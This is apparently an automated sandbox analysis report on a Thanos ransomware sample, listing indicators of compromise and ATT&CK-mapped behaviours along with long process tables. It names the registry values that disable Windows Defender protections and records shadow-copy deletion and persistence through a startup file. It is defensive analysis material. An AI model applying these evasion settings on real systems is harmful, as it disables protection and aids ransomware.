thanos | 4a09528f4ab9eddacb1944e3c2fae6f24cb37c267f7c9360b494c5edfc62365b

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	Thanos.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Thanos.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Thanos.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Thanos.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Thanos.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	Thanos.exe

Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
ransomware thanos

Thanos executable 1 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002b4cd-615.dat	family_thanos_ransomware

Thanos family
thanos
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (51) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 3 IoCs

flow	pid	Process
45	5508	mshta.exe
46	5508	mshta.exe
47	5508	mshta.exe

Downloads MZ/PE file 3 IoCs

flow	pid	Process
41	4960	chrome.exe
41	4960	chrome.exe
44	2404	Thanos.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	Thanos.exe

Executes dropped EXE 3 IoCs

pid	Process
228	gr2a4ksy.exe
6196	thing.exe
1080	thing.exe

Loads dropped DLL 11 IoCs

pid	Process
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe
1080	thing.exe

Enumerates connected drives 3 TTPs 16 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
10	raw.githubusercontent.com
41	raw.githubusercontent.com
42	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2868	arp.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5772	sc.exe
3872	sc.exe
3004	sc.exe
2612	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Thanos.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\thing.exe:Zone.Identifier	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001a00000002b628-1021.dat	pyinstaller

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gr2a4ksy.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3472	cmd.exe
6764	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Interacts with shadow copies 3 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1080	vssadmin.exe
1092	vssadmin.exe
416	vssadmin.exe
4488	vssadmin.exe
5328	vssadmin.exe
1700	vssadmin.exe
4504	vssadmin.exe
5400	vssadmin.exe
248	vssadmin.exe
400	vssadmin.exe
3260	vssadmin.exe
5176	vssadmin.exe
5544	vssadmin.exe
3816	vssadmin.exe

Kills process with taskkill 3 IoCs

defense_evasion

pid	Process
5472	taskkill.exe
6076	taskkill.exe
3084	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133886587651236480"	chrome.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Thanos.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\thing.exe:Zone.Identifier	chrome.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6764	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4468	chrome.exe
4468	chrome.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe
Token: SeShutdownPrivilege	4468	chrome.exe
Token: SeCreatePagefilePrivilege	4468	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe

Suspicious use of SendNotifyMessage 35 IoCs

pid	Process
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
2404	Thanos.exe
2404	Thanos.exe
2404	Thanos.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe
4468	chrome.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1080	thing.exe
1080	thing.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4468 wrote to memory of 2044	4468	chrome.exe	82
PID 4468 wrote to memory of 2044	4468	chrome.exe	82
PID 1944 wrote to memory of 2200	1944	chrome.exe	84
PID 1944 wrote to memory of 2200	1944	chrome.exe	84
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4888	4468	chrome.exe	85
PID 4468 wrote to memory of 4960	4468	chrome.exe	86
PID 4468 wrote to memory of 4960	4468	chrome.exe	86
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87
PID 4468 wrote to memory of 4988	4468	chrome.exe	87

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\JRKGaming
1⤵
PID:5320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9400dcf8,0x7ffa9400dd04,0x7ffa9400dd10
  2⤵
  PID:2044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1936,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1928 /prefetch:2
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2232,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2248 /prefetch:11
  2⤵
  - Downloads MZ/PE file
  PID:4960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2372 /prefetch:13
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:3400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4252 /prefetch:9
  2⤵
  PID:5932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4676,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:5780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5224,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5240 /prefetch:14
  2⤵
  PID:2008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5460,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5476 /prefetch:14
  2⤵
  PID:3480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5472,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5588 /prefetch:14
  2⤵
  PID:236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5572,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5340 /prefetch:14
  2⤵
  PID:640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4556,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5360 /prefetch:14
  2⤵
  PID:1956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5788,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5328 /prefetch:14
  2⤵
  PID:3960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5328,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5964,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6128 /prefetch:1
  2⤵
  PID:712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5284,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4748 /prefetch:14
  2⤵
  PID:3592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3212,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4700 /prefetch:14
  2⤵
  PID:408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5768,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4236 /prefetch:14
  2⤵
  PID:4168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4756,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5372 /prefetch:14
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5492,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5320 /prefetch:9
  2⤵
  PID:2820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1164,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3540 /prefetch:10
  2⤵
  PID:5888
- C:\Program Files\Google\Chrome\Application\chrome.exe
